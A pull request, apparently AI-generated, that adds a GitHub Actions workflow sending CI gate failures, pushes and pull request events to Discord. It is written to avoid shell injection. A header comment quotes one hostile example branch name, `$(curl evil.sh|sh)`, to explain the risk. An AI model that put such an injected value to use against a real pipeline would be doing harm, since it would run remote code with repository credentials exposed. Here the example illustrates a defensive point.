### PR TITLE
ci: report gate failures, pushes and pull requests to discord

### DIFF
--- a/.github/workflows/discord.yml
+++ b/.github/workflows/discord.yml
@@ -1,0 +1,184 @@
+name: discord
+
+# Repository events into a Discord channel. This file is shared by zoxy,
+# zrk and zssl and differs only in two places — the workflow list it
+# watches and the `username` the payload posts under — so a fix to one
+# belongs in all three.
+#
+# Three kinds of event, chosen so the channel stays readable: a gate that
+# *fails*, a push to main, and a pull request opening or closing.
+# Successful gates are deliberately silent — every gate runs on every
+# push, and a green message per gate per commit is a channel nobody
+# reads, which is the same as no notifications at all. The README badges
+# already say what is green.
+#
+# The webhook is a secret and never a literal: these repositories are
+# public, and anyone holding that URL can post to the channel until it is
+# rotated in Discord. It is also withheld from a pull request opened from
+# a fork, which is why every job tolerates an empty `WEBHOOK` and falls
+# back to the run summary instead of failing.
+#
+# Every payload is built by `jq --arg` from environment variables, never
+# by interpolating `${{ }}` into a shell script. A branch name or PR
+# title is attacker-supplied text on a public repo — someone opens a pull
+# request from a branch called `$(curl evil.sh|sh)` — and `${{ }}` pastes
+# it into the script *before* the shell sees it, which is command
+# injection with the repository's token in scope. `env:` makes it a
+# variable and `--arg` makes it a JSON string.
+on:
+  workflow_run:
+    workflows:
+      - CI
+      - Release
+    types: [completed]
+  push:
+    branches: [main]
+  pull_request:
+    types: [opened, reopened, closed]
+
+permissions:
+  contents: read
+
+jobs:
+  gate-failed:
+    # `workflow_run` fires for every completion; only the bad ones speak.
+    # `cancelled` is excluded on purpose: every gate has a concurrency
+    # group that cancels superseded runs, so a cancellation is almost
+    # always a newer push rather than a result.
+    if: >-
+      github.event_name == 'workflow_run' &&
+      github.event.workflow_run.conclusion == 'failure'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Report to Discord
+        env:
+          WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
+          GATE: ${{ github.event.workflow_run.name }}
+          BRANCH: ${{ github.event.workflow_run.head_branch }}
+          RUN_URL: ${{ github.event.workflow_run.html_url }}
+          SHA: ${{ github.event.workflow_run.head_sha }}
+        run: |
+          set -euo pipefail
+          title="$GATE failed"
+          detail=$(printf 'On `%s`, commit `%s`.' "$BRANCH" "${SHA:0:7}")
+          if [ -z "${WEBHOOK:-}" ]; then
+            echo "::warning::DISCORD_WEBHOOK is not set; skipping the report."
+            printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"
+            exit 0
+          fi
+          jq -n --arg title "$title" --arg detail "$detail" \
+                --arg url "$RUN_URL" --arg branch "$BRANCH" \
+                --arg sha "${SHA:0:7}" \
+            '{
+              username: "zrk",
+              embeds: [{
+                title: $title,
+                description: $detail,
+                color: 15158332,
+                url: $url,
+                fields: [
+                  {name: "Branch", value: $branch, inline: true},
+                  {name: "Commit", value: $sha, inline: true}
+                ]
+              }]
+            }' > payload.json
+          curl -sS -f -X POST -H "Content-Type: application/json" \
+            -d @payload.json "$WEBHOOK" > /dev/null
+          printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"
+
+  pushed:
+    if: github.event_name == 'push'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Report to Discord
+        env:
+          WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
+          MESSAGE: ${{ github.event.head_commit.message }}
+          AUTHOR: ${{ github.event.head_commit.author.name }}
+          COMMIT_URL: ${{ github.event.head_commit.url }}
+          SHA: ${{ github.sha }}
+        run: |
+          set -euo pipefail
+          # First line only: these commit messages run to forty lines.
+          title=$(printf '%s' "$MESSAGE" | head -n 1)
+          detail=$(printf 'Pushed to `main` by %s.' "$AUTHOR")
+          if [ -z "${WEBHOOK:-}" ]; then
+            echo "::warning::DISCORD_WEBHOOK is not set; skipping the report."
+            printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"
+            exit 0
+          fi
+          jq -n --arg title "$title" --arg detail "$detail" \
+                --arg url "$COMMIT_URL" --arg sha "${SHA:0:7}" \
+                --arg author "$AUTHOR" \
+            '{
+              username: "zrk",
+              embeds: [{
+                title: $title,
+                description: $detail,
+                color: 3066993,
+                url: $url,
+                fields: [
+                  {name: "Commit", value: $sha, inline: true},
+                  {name: "Author", value: $author, inline: true}
+                ]
+              }]
+            }' > payload.json
+          curl -sS -f -X POST -H "Content-Type: application/json" \
+            -d @payload.json "$WEBHOOK" > /dev/null
+          printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"
+
+  pull-request:
+    if: github.event_name == 'pull_request'
+    runs-on: ubuntu-latest
+    steps:
+      - name: Report to Discord
+        env:
+          WEBHOOK: ${{ secrets.DISCORD_WEBHOOK }}
+          TITLE: ${{ github.event.pull_request.title }}
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          NUMBER: ${{ github.event.pull_request.number }}
+          AUTHOR: ${{ github.event.pull_request.user.login }}
+          MERGED: ${{ github.event.pull_request.merged }}
+          ACTION: ${{ github.event.action }}
+        run: |
+          set -euo pipefail
+          if [ "$ACTION" = closed ]; then
+            if [ "$MERGED" = true ]; then
+              verb=Merged
+              color=10181046
+            else
+              # Distinct from merged: nothing landed, and that is worth
+              # saying rather than implying by omission.
+              verb=Closed
+              color=9807270
+            fi
+          else
+            verb=Opened
+            color=3066993
+          fi
+          title=$(printf '#%s %s' "$NUMBER" "$TITLE")
+          detail=$(printf '%s by %s.' "$verb" "$AUTHOR")
+          if [ -z "${WEBHOOK:-}" ]; then
+            echo "::warning::DISCORD_WEBHOOK is not set; skipping the report."
+            printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"
+            exit 0
+          fi
+          jq -n --arg title "$title" --arg detail "$detail" \
+                --arg url "$PR_URL" --argjson color "$color" \
+                --arg author "$AUTHOR" --arg verb "$verb" \
+            '{
+              username: "zrk",
+              embeds: [{
+                title: $title,
+                description: $detail,
+                color: $color,
+                url: $url,
+                fields: [
+                  {name: "State", value: $verb, inline: true},
+                  {name: "Author", value: $author, inline: true}
+                ]
+              }]
+            }' > payload.json
+          curl -sS -f -X POST -H "Content-Type: application/json" \
+            -d @payload.json "$WEBHOOK" > /dev/null
+          printf '%s\n\n%s\n' "$title" "$detail" >> "$GITHUB_STEP_SUMMARY"


### PR DESCRIPTION
Adopts the notifier zssl has run since its #10, verbatim. It differs from zssl's copy in exactly two places: the `workflow_run` list (`CI` and `Release`, the two gates this repo has) and the `username` on the payload.

Three events reach the channel — a gate that fails, a push to `main`, and a pull request opening or closing. A green gate stays silent: the README badges already say what is green, and a message per gate per commit is a channel nobody reads.

Every payload is built by `jq --arg` from environment variables rather than by interpolating `${{ }}` into the shell. A branch name or PR title on a public repo is attacker-supplied text, and `${{ }}` pastes it in before the shell parses the script.

**Needs `DISCORD_WEBHOOK` in this repository's secrets.** Without it nothing fails — each job logs a `::warning::` and writes the report to the run summary — but nothing reaches Discord either. That same path is what a pull request from a fork takes, since the secret is withheld there.

Companion PRs: zoxy-io/zoxy adds the same file, zoxy-io/zssl#13 updates its copy's header.

🤖 Generated with [Claude Code](https://claude.com/claude-code)